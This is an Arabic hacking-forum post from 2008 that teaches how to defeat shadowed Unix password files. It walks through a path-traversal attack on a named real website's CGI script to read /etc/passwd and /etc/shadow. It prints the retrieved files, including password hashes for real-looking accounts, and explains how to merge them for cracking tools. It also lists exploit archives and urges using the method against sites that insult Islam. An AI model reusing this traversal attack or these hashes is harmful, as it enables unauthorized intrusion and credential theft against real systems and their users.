- ولو كان ملف كلمة المرور مضلل ، ماذا علي ان أعمل ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
دائما سوف تواجه كلمة مرور مضلله ، لكن هناك طريقه تسمى Unshadow لحل هذه المشكله !!
إذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو (ملف الظل) shadow file
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي :
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
token تعني الرمز الذي يوجد في الملف passwd ، وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو (أكرر ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه)
هذا ملف shadow
------------------------------------------------------------------------------------------------
root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::
------------------------------------------------------------------------------------------------
نلاحظ ان كلمات السر موجوده
الخطوه الأخيره وهي دمج ملف الباسورد passwd file مع shadow passwd لنحصل على ملف متكامل ونقدمه الى برامج الكسر السابق ذكرها...
هذا ملف باسورد حصلنا عليه من
http://wilsonweb2.hwwilson.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd------------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh
------------------------------------------------------------------------------------------------
ومن الـ token الموضح واللي هو x نعرف من خلال الجدول السابق ذكره بأن كلمة المرور الصحيحه في الدليل /etc/shadow
إذن نتوجه بالمتصفح الى
http://wilsonweb2.hwwilson.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/shadowلنحصل على الملف
------------------------------------------------------------------------------------------------
root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185::::::
------------------------------------------------------------------------------------------------
نقوم بنسخ كلمات السر الموجوده فيه ولصقها مكان علامه x في ملف الباسورد ، وهكذا مع جميع الحسابات لنحصل على ملف لمة مرور كامل ومتكامل ونقدمه الى برامج الكسر
ملاحظه مهمه :-
عليك جعل كل حساب في سطر ، يعني تربتها لتتعرف عليها برامج الكسر ...
مواقع تستحق الزياره :-
أنا متواجد في منتديات الكواكب العربيه على العنوان التالي
www.kwakeb.netبريدي الإلكتروني
condor@phreaker.netأرشيف لثغرات
www.securiteam.com/exploits/archive.htmlأرشيف لثغرات
www.ussrback.comأرشيف ثغرات + الكثير
www.secureroot.comأرشيف ثغرات
www.rootshell.comأرشيف ثغرات
www.ussrback.comمواقع لثغرات
www.secureroot.com/category/exploitsدليل لمواقع الهاكينق
www.hitboss.com/Hackingمحرك بحث لا غني عنه
www.undergroundnews.com/resources/search/underground/search.aspWarez.com-Underground
www.warez.comHacking (ممتاز لمن يريد البدايه)
www.neworder.box.skSecurity Search Engine
www.bugs2k.cominsecure
www.insecure.org</XMP></BODY></HTML>
http://public.www.easynet.co.uk/cgi-bin/formmail/formmail.plوإن شاء الله ما يكون التطبيق علي
بل نتعلم لنستفيد ولا نضر إلى لوقت الضرورة
بل تطبق هذة المعلومات على مواقع تسب الإسلام
والسلام
الأحد فبراير 24, 2008 8:38 am